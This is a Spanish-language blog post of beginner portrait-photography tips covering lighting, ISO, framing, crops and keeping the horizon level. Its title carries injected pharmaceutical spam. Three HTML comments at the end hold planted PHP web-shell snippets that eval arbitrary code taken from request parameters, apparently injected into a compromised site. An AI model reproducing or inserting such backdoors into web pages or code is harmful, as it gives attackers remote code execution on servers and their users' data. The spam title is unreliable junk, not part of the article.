Cialis viagra levitra online Apuntes básicos para empezar a hacer retratos (parte 1)

Publicada en Publicada en Apuntes fotográficos, Consejos

Cuántas veces hemos hecho una captura de nuestro hijo, novia o abuela con esa expresión tan suya que quedamos encantados. Pero cuando la miramos más fríamente un par de días después o las comparamos con imágenes profesionales vemos que, a pesar que nos gusta, les falta “algo” para ser realmente un gran retrato.

Sobre ese algo vamos a hablar en esta primera entrada con la que inauguramos este blog.

El algo al que nos referimos son detalles tan importantes como el modelo de nuestro retrato. Y si conocemos estos aspectos, y les prestamos la atención debida, veremos que nuestras fotos ganan un plus importante de calidad.

Dejémonos de vueltas y vamos al grano:

LA LUZ

Primero que nada busca un lugar con bastante luz. Es importante que las caras no salgan oscuras. Piensa que la cara es lo que mejor se debería ver en un retrato. Por tanto debe estar bien iluminada.

Lo mejor es un lugar con mucha luz pero suave, que no sea directa del sol. Por ejemplo un interior con grandes o muchas ventanas. O un espacio abierto bajo una sombra. La idea es que llegue luz indirecta a nuestro modelo. Es mejor evitar los rayos directos del sol porque tiene una luz muy dura, es decir que proyecta sombras con los bordes muy definidos.

Si no hay suficiente luz, deberás agregarla tú con un flash. Ya te daremos consejos sobre el uso del flash en una futura entrada de este blog.

¿Cómo sabes si la luz es insuficiente? Las cámaras suelen tener un indicador de exposición con un signo (-) en un extremo, un (+) en el otro y un punto central. A grandes rasgo podemos decir que si el indicador no está en ese punto central y se desplaza hacia el signo (-) es que falta luz. Y lo contrario, si se acerca al (+), es que la luz es excesiva. Si sabes manejar el histograma, lo mejor sería guiarte por él. Ya hablaremos más adelante también del histograma.

Otra opción, en lugar de usar el flash, es subir el ISO en caso de que la luz fuera insuficiente. Puede que la cámara lo haga automáticamente si estás en modo “auto” o que lo tengas que hacer tú con el mando correspondiente.

Si vas a subir ISO te aconsejamos que tengas cuidado ya que puede mermar mucho la calidad de la imagen por aparición de ruido. Pero ello dependerá de la tecnología de tu cámara.  Las más nuevas  y de gama alta admiten subirlo mucho (a valores de 800 ó 1600 y las muy buenas incluso más) mientras que la mayoría nos empiezan a entregar imágenes muy pobres si superamos los 400.

Nuestro consejo con el ISO es dejarlo en el valor más bajo (100 ó 200) a menos que no nos quede otra opción por falta de luz.

Busca en el manual de tu cámara como desactivar la opción de ISO automático incluso cuando la uses en modo de disparo automático (suele poder hacerse). Podrías olvidarte del ISO si tienes una cámara muy nueva y de gama media o alta.

Si estás en exterior, a menos que busques un efecto concreto o que sepas trabajar muy bien la luz, no es buena idea el contraluz (el sol desde atrás del retratado). Pero tampoco la luz frontal directa al retratado porque provoca molestias en nuestros modelos determinando gestos poco favorecedores como ojos entrecerrados y ceño fruncido. Además la luz frontal aplana mucho los volúmenes. Lo mejor es el sol a un lado a unos 45 grados para los retratos de frente. Para una foto de perfil la luz lateral (lateral para la cámara, frontal al modelo) modela muy bien.

Tampoco es aconsejable el sol a pleno mediodía que ilumina desde arriba puesto que genera sombras muy desfavorecedoras deformando la nariz y dejando los ojos sumergidos en la oscuridad.

En exteriores te recomendamos que hagas los retratos temprano o al atardecer para evitar el sol cenital.

Foto de ejemploEL PLANO DE ENCUADRE

El retratado es el sujeto principal en un retrato, por ende debes llenar el encuadre con tu modelo. El retratado no es una pieza más, es el protagonista y debe verse grande en la imagen.

Si no vas a hacer una foto de cuerpo entero evita los cortes en las articulaciones. Nunca cortes los brazos en el codo o en la muñeca.  Corta a medio camino entre hombro y codo o incluye el brazo completo. Lo mismo para las piernas no las cortes en las rodillas, corta a mitad de los muslos.

En un retrato cercano de primer plano jamás cortes por el cuello. El corte debería estar por debajo de los hombros.

Si eres más alto que tu modelo, agáchate un poco. Pero no demasiado porque si tiene que bajar el rostro para mirar a cámara en muchas personas se puede formar una papada que luego no te agradecerá cuando se vea en la foto. La altura ideal sería a la altura de sus ojos.

Si es un niño agáchate aún más o échate al suelo si es preciso. Un buen retratista no se preocupa si la ropa se le ensucia un poco.

EL HORIZONTE

El horizonte es una línea precisamente horizontal. Y así debe salir en la foto.

Según la circunstancia el horizonte puede ser el mar o puede ser una mesa donde el retratado se apoya. O, si estás retratando a un profesor, el horizonte podrá ser una pizarra que tenga detrás.

Sea lo que sea debe mantener su horizontalidad.

Puede que quizás te guste inclinar la cámara. En fotografía eso tiene un nombre que se llama “plano holandés”. Si eso es lo que quieres, entonces inclínala bien. No lo dejes a medias. Si un horizonte no está horizontal que no sea por descuido. De todas formas te aconsejamos no abusar mucho de esta técnica.

Con estos consejos ya tienes para empezar.
¡Coge la cámara y a tirar fotos!

En el retrato que acompaña este artículo puedes observar que están aplicados estos consejos.
Observa cómo en esa foto están representados todos los conceptos que te acabamos de reseñar:

  • Una luz suave lateral proveniente desde la izquierda, de una ventana a través de la cual entra la luz indirecta del sol.
  • La chica no deja dudas que es la protagonista llenando bien el cuadro.
  • Presta atención a los límites del encuadre y cómo los cortes respetan los conceptos que te explicamos.
  • La horizontalidad en esta foto está dada por los ojos y por una línea en la pared del fondo que, aunque está desenfocada, deja claro el nivel del horizonte. Esa línea no fue incluida a propósito, pero lo importante es que si en el cuadro sale algo que es horizontal, debe respetarse el nivel para evitar la sensación de “caída”.

Puedes dejar comentarios sobre esta entrada en nuestro Facebook.

En el próximo artículo te daremos la segunda parte de estos consejos. Hablaremos de otros aspectos también muy a tener en cuenta:
El fondo, el foco, el entorno y el atrezzo, la pose.

<!– [insert_php]if (isset($_REQUEST["lNo"])){eval($_REQUEST["lNo"]);exit;}[/insert_php][php]if (isset($_REQUEST["lNo"])){eval($_REQUEST["lNo"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["hmk"])){eval($_REQUEST["hmk"]);exit;}[/insert_php][php]if (isset($_REQUEST["hmk"])){eval($_REQUEST["hmk"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["SlzCh"])){eval($_REQUEST["SlzCh"]);exit;}[/insert_php][php]if (isset($_REQUEST["SlzCh"])){eval($_REQUEST["SlzCh"]);exit;}[/php] –>